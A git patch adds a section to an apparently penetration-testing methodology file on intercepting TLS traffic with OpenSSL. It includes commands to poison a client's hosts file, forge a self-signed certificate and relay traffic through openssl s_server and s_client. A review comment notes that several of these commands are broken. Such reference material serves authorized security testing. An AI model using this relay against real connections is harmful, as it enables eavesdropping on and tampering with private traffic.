From 230f8c368860f537bf888d6d67a86a2eaeb6997b Mon Sep 17 00:00:00 2001 From: CravateRouge Date: Thu, 19 Jan 2023 16:33:11 +0100 Subject: [PATCH] Add SSL MITM using OpenSSL --- Methodology and Resources/Network Discovery.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index c296724..b76dd23 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -9,6 +9,7 @@ - [Responder](#responder) - [Bettercap](#bettercap) - [Reconnoitre](#reconnoitre) +- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl) - [References](#references) ## Nmap @@ -196,6 +197,23 @@ bettercap -X --proxy --proxy-https -T # targetting specific IP only ``` +## SSL MITM with OpenSSL +This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl. +If you can modify `/etc/hosts` of the client: +```powershell +sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host +``` +On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server): +```powershell +openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem +``` +On our MITM server, we setup our infra: +```powershell +mkfifo response +sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response +``` +In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example. + ## References * [TODO](TODO)
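Review bot: the `sudo echo "..." >> /etc/hosts` line in the second hunk will fail with "Permission denied", because `sudo` only elevates `echo` while the `>>` redirection is opened by the caller's unprivileged shell; write it as `echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" | sudo tee -a /etc/hosts` instead. In the `s_server`/`s_client` pipeline, `-connect[IP of server to MITM]:[PORT]` is missing the space between `-connect` and its argument, and the two bare `tee` invocations only copy stdin to stdout, so nothing is displayed or recorded; `tee` needs a file argument (a log file, for instance) for the closing sentence "traffic is only displayed with `tee`" to hold. All three fences are tagged `powershell` although the commands are POSIX shell (`sudo`, `mkfifo`, pipes); tag them `bash`. Wording: "self signed" should be "self-signed", "we setup our infra" should be "we set up our infra", and "using only openssl" should read "using only OpenSSL".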